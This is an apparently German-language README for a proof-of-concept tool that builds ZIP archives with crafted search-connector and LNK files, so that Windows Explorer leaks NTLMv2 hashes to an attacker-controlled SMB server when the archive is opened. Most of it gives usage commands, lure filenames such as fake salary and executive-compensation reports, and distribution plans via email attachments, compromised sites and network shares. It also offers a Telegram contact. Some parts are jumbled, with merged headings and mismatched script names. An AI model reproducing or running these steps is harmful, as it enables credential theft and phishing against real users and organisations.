
Windows Datei-Explorer Zero Click NTLMv2-SSP-Hash-Offenlegung
Klicken Sie auf das Bild oben, um die Demonstration der Sicherheitslücke anzusehen
Das grundlegende Sicherheitsproblem liegt in der automatischen Verarbeitung eingebetteter UNC-Pfade durch die Windows-Shell in bestimmten Dateiformaten während der Vorschauoperationen. Wenn Benutzer ZIP-Archive mit speziell präparierten Dateien öffnen, löst der Windows-Explorer automatisch UNC-Pfade ohne Zustimmung des Benutzers auf, initiiert SMB-Authentifizierungsversuche und legt NTLMv2-SSP-Hashes gegenüber Angreifer-kontrollierten Servern offen.
Datei: ntlm-disclosure-poc.py
Diese erste Implementierung nutzt Windows-Suchverbinder-Dateien (.searchConnector-ms) aus, bei denen es sich um XML-basierte Konfigurationsdateien handelt, die Suchspeicherorte für den Windows-Explorer definieren. Die Sicherheitslücke wird ausgelöst, wenn Windows den eingebetteten UNC-Pfad im simpleLocation-Element während der ZIP-Archivvorschau automatisch verarbeitet.
Technische Merkmale:
searchConnectorDescription-ElementeDatei: patch_bypass.ps1
Diese verbesserte Technik adressiert Microsofts ersten Patch, indem sie LNK-Dateieigenschaften ausnutzt. Der Angriff nutzt das Verhalten des Windows-Explorers aus, Symbolmetadaten abzurufen und Zielpfade während der ZIP-Dateivorschau aufzulösen, während er durch sorgfältige Eigenschaftskonfiguration den Zero-Click-Exploitationsvektor beibehält.
Technische Merkmale:
TargetPath-Eigenschaft3.6+colorama5.1+Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser# Basic usage
python ntml-disclosure-poc.py 192.168.1.100
# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip
# Example output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip
Parameters
target (required): Target IP address or hostname
-o, --output: Custom output filename for ZIP package
# Basic usage - LNK file auto-removed
.\bypass.ps1 -IP 192.168.1.100
# Keep LNK file for external distribution
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk
# Custom lure name and share
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName" -KeepLnk
# Specify output directory
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk
Parameter
-IP (erforderlich): Ziel-SMB-Server-IP-Adresse
-Share: SMB-Freigabename (Standard: 'share')
-File: Zieldateiname (Standard: 'payload.exe')
-Lure: Social-Engineering-Dateiname (Standard: 'Your_File_For_Payload_Here')
-OutDir: Ausgabeverzeichnis (Standard: aktuelles Verzeichnis)
-KeepLnk: LNK-Datei nach ZIP-Erstellung beibehalten
graph TD
A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
C --> D[🛡️ Microsoft Patch]
D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
E --> F[🔴 Current State<br/>Active Exploitation]
style A fill:#ffcccc
style C fill:#ffddcc
style E fill:#ffffcc
style F fill:#ccffcc📨 Szenario 1: Direkte ZIP-Verteilung
# Create ZIP payload
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"
# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments
🔄 Szenario 2: LNK-Dateiübertragung
# Create and preserve LNK file for multi-host deployment
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk
# Cross-host deployment:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites
🎯 Szenario 3: Gezieltes Social Engineering
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
- Group & Contact: t.me/initial_persistence
- Email: [email protected]
| Vektor | Auslösemechanismus | Benutzerinteraktion | Patch-Status |
|---|
| 🔗 Suchverbinder | XML-Parsing + UNC-Auflösung | ZIP öffnen | 🛡️ Gepatched |
| 📎 LNK TargetPath | Symbolmetadatenabruf | ZIP öffnen | 🔴 Aktiv |